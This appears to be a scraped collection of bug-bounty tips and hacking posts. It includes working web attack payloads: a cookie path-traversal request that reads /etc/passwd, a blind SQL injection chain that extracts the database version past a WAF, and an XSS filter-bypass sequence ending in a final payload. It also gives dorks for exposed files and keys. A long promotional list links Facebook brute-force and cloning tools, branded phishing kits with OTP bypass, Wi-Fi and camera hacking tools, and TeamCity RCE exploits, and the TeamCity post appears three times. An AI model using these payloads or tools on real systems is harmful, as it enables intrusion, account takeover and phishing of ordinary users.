Bug bounty Tips

Bugbounty Tip2: Learn how to monitor JavaScript files using JSMon, GetJS & Telegram. To get notified and be the first to test the changes before anyone else. https://t.co/QlUN2uerGn

# Google Dork: "index of" "user.MYD" # Title: Disclosure of sensitive files. # Date: 15/08/2020 # Author: Sahil Saxena # LinkedIn: https://www.linkedin.com/in/sahil-saxena-1333b9174 # Twitter: https://twitter.com/Sahil_delinitor # GitHub: https://github.com/Sahil-69 # Bugcrowd: https://bugcrowd.com/Prickn Thanks, Sahil Saxena

#bugbounty Interesting file path you should look (keep in the assets box) which can be turn into bigger bug (P1) like LFI to RCE + reverse shell.

Bug Bounty Tips :- Part 1:- https://t.co/g7hCKCHvtj Part 2:- https://t.co/iwv4hFCOo1 Part 3:- https://t.co/Rp9xqp8qTo Part 4:- https://t.co/k70pFZb1sj

Recon Tip for : -Subdomain enumeration -Finding endpoints -Finding parameters #bugbountytips #BugBounty #reconnaissance https://t.co/IKr8ehNg24

Scanned the same big target with different sub enum tools and stored lists (no apis provided), here is the results: Amass - 4k results findomain - 18k results fdns - 125k results chaos - 400k results #bugbountytip, #bugbounty 1/2

#bugbounty SPECIAL - Finding for API keys, Tokens and Passwords with Github Dorks

How to find local file read vulnerabilities based on cookies. Request GET /vulnerable.php HTTP/1.1 Cookie:usid=../../../../../../../../../../../../../etc/pasdwd Response HTTP/1.1 200 OK ... Server: Apache root:fi3sER6:0:1:System Operator:/:/bin/ksh// #bugbounty #bugbountytip

Hey Blind Sql ? Hey Error Based? 1. site.com/search/test 200 2.site.com/search/test' Error Something has gone wrong and this URL cannot be processed at this time. 3. site.com/search/test--+ Disallowed Key Characters in URL. 4. site.com/search/dGVzdA== test encoded base64 result. Your search for test returned 183 results 5. site.com/search/dGVzdCc= test' base64 result. Your search for test not found 6. https://www.site.com/search/dGVzdCctLSs= test'--+ base64 result. Your search for test returned 183 results 7. test' order by 1--+ not found 8. test'--+ result found 9. test' and extractvalue(0x0a,concat(0x0a,(select version())))--+ 403 10. test' and extractvalue/**_**/(0x0a,concat/**_**/(0x0a,(select/**_**/version())))--+ 403 11. test' and extractvalue%23AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%0a(0x0a,concat%23AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%0a(0x0a,(select%23AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%0aversion())))--+ hey version Found bounty $$$$$

Xss Hello Waf site.com/cart/11?input=admin reflected site.com/cart/11?input=admin' reflected admin' site.com/cart/11?input=admin'" reflected admin'" site.com/cart/11?input=admin'"> reflected admin'"> site.com/cart/11?input=admin'">< Access Denied 403 site.com/cart/11?input=admin>< reflected site.com/cart/11?input=admin'>< reflected site.com/cart/11?input=admin'">< Access Denied 403 site.com/cart/11?input=admin"<> reflected site.com/cart/11?input=admin"<svg Access Denied 403 site.com/cart/11?input=admin"<1 Access Denied 403 hey waf site.com/cart/11?input=leet"%00<svg reflected bypassed site.com/cart/11?input?leet"%00<svg/OnlOad= Access Denied 403 site.com/cart/11?input?leet"%00<svg/OnlOads= event handler :( All are blocked site.com/cart/11?input?leet"%00<svg/O%0an%0al%0ao%0aa%0a%0a%0ad%3d Reflected Bypassed site.com/cart/11?input?leet"%00<Svg/O%0an%0al%0ao%0aa%0a%0a%0ad%3dconfirm(1) Access Denied 403 Final Payload site.com/cart/11?input?leet"%00<Svg/O%0an%0al%0ao%0aa%0a%0a%0ad%3dconfirm%601%60> Bounty $$$+Extra for bypassing waf

Here some good tip 1. Create an account email@burp_collab* 2. Forgot password 3. Received requests from internal server + SMTP connection details 4. Got Internal headers + origin IP 5. http://site.com/admin = (403) 6. http://site.com/admin = (Headers + Origin IP = pwn)

var ipElements=document.querySelectorAll('strong');var ips=[];ipElements.forEach(function(e){ips.push(e.innerHTML.replace(/["']/g,''))});var ipsString=ips.join('\n');var a=document.createElement('a');a.href='data:text/plain;charset=utf-8,'+encodeURIComponent(ipsString);a.download='0xHussein.txt';document.body.appendChild(a);a.click();

😍 WORLD DANGEROUS HACKERS TOOL EXPOSE 😍   Pish web tool 🔗 Link : https://github.com/Cabdulahi/pish ❇️ MITM attack tool 🔗 Link : https://github.com/websploit/websploit ❇️ kill shot pentesting framework 🔗 Link :https://github.com/bahaabdelwahed/killshot ❗ Facebook Tool Links ❗ ❇️ Facebook information gathering 🔗 Link :  git clone https://github.com/CiKu370/OSIF.git ❇️ Facebook Toolkit + bots,  dump private data 🔗 Link : https://github.com/warifp/FacebookToolkit ❇️ Facebook cracking tool Fcrack.py 🔗 Link : https://github.com/INDOnimous/FB-Crack- ❇️ Facebook and yahoo account cloner 🔗 Link : https://gitlab.com/W1nz0N/fyc.git ❇️ Facebook report tool 🔗 Link : git clone https://github.com/IlayTamvan/Report ❇️ Facebook BruteFoRce Tool 🔗 Link : https://github.com/IAmBlackHacker/Facebook-BruteForce ❇️ Facebook hacking ASU 🔗 Link : git clone https://github.com/LOoLzeC/ASU ❇️ Facebook Downloader 🔗 Link : https://github.com/barba99/facebook-spotify-youtube-descargar ❇️ Hack Facebook MBF 🔗 Link : git clone https://github.com/Rizky-ID/autombf ❇️ Facebook Repot3 🔗 Link : git clone https://github.com/PangeranAlvins/Repot3 ❇️ Facebook Information Gathering 🔗 Link : https://github.com/xHak9x/fbi ❇️ Facebook Brute with TOR 🔗 Link : https://github.com/thelinuxchoice/facebash ❗Networking Tool Links❗ ❇️ ip camera 📷 hacking 🔗 Link : https://github.com/kancotdiq/ipcs ❇️ Termux Lazyscript tool 🔗 Link : https://github.com/TechnicalMujeeb/Termux-Lazyscript ❇️ TMscanner Tool 🔗 Link : https://github.com/TechnicalMujeeb/TM-scanner ❇️ Trace location with IP 🔗 Link : https://github.com/Rajkumrdusad/IP-Tracer ❇️ WPS Wi-Fi hacking tool 🔗 Link : https://github.com/nxxxu/AutoPixieWps ❇️ Routersploit - vulnerability scanner and attacker 🔗 Link : https://github.com/reverse-shell/routersploit.git ❇️ Local network exploiting tool Zarp 🔗 Link : https://github.com/hatRiot/zar ❇️ ip tracker,  Device info by link 🔗 Link : https://github.com/lucasfarre/ip-tracker ❇️ Ip-Fy IP address information 🔗 Link : https://github.com/T4P4N/IP-FY.git ❇️ Wifite Wi-Fi hacking tool 🔗 Link : https://github.com/derv82/wifite ❗ Phishing Tool Links ❗ ❇️ Modern phishing tool hidden eye 🔗 Link :https://github.com/DarkSecDevelopers/HiddenEye ❇️ complete phishing tool 32 templates + 1 customizable 🔗 Link :https://github.com/thelinuxchoice/blackeye ❇️ social media phishing with shellphish 🔗 Link : https://github.com/thelinuxchoice/shellphish ❇️ Advance Phishing OTP Bypass 🔗 Link : https://github.com/Ignitetch/AdvPhishing ❇️ Paytm Phishing OTP Bypass 🔗 Link : https://github.com/Ignitetch/Paytm-Phishing ❇️ UberEats Phishing OTP Bypass 🔗 Link : https://github.com/Ignitetch/UberEats-Phishing ❇️ Whats App Phishing 🔗 Link : https://github.com/Ignitetch/whatsapp-phishing ❇️ Zomato Phishing 🔗 Link : https://github.com/Ignitetch/Zomato-Phishing ❇️ hotstar OTP Bypass 🔗 Link : https://github.com/Ignitetch/Hotstar-otp-bypass ❇️ Ola OTP Bypass 🔗 Link ::-)https://github.com/Ignitetch/ola-otpbypass ❇️ Amazon Payment Gateway Phishing 🔗 Link : https://github.com/Ignitetch/Amazon-payment-gateway-phishing ♻️Share And Support us♻️ 🔥 

#CVE-2024-27198 & CVE-2024-27199 Authentication Bypass --> #RCE in #JetBrains #TeamCity #exploit https://github.com/W01fh4cker/CVE-2024-27198-RCE https://github.com/Chocapikk/CVE-2024-27198

#CVE-2024-27198 & CVE-2024-27199 Authentication Bypass --> #RCE in #JetBrains #TeamCity #exploit https://github.com/W01fh4cker/CVE-2024-27198-RCE https://github.com/Chocapikk/CVE-2024-27198

#CVE-2024-27198 & CVE-2024-27199 Authentication Bypass --> #RCE in #JetBrains #TeamCity #exploit https://github.com/W01fh4cker/CVE-2024-27198-RCE https://github.com/Chocapikk/CVE-2024-27198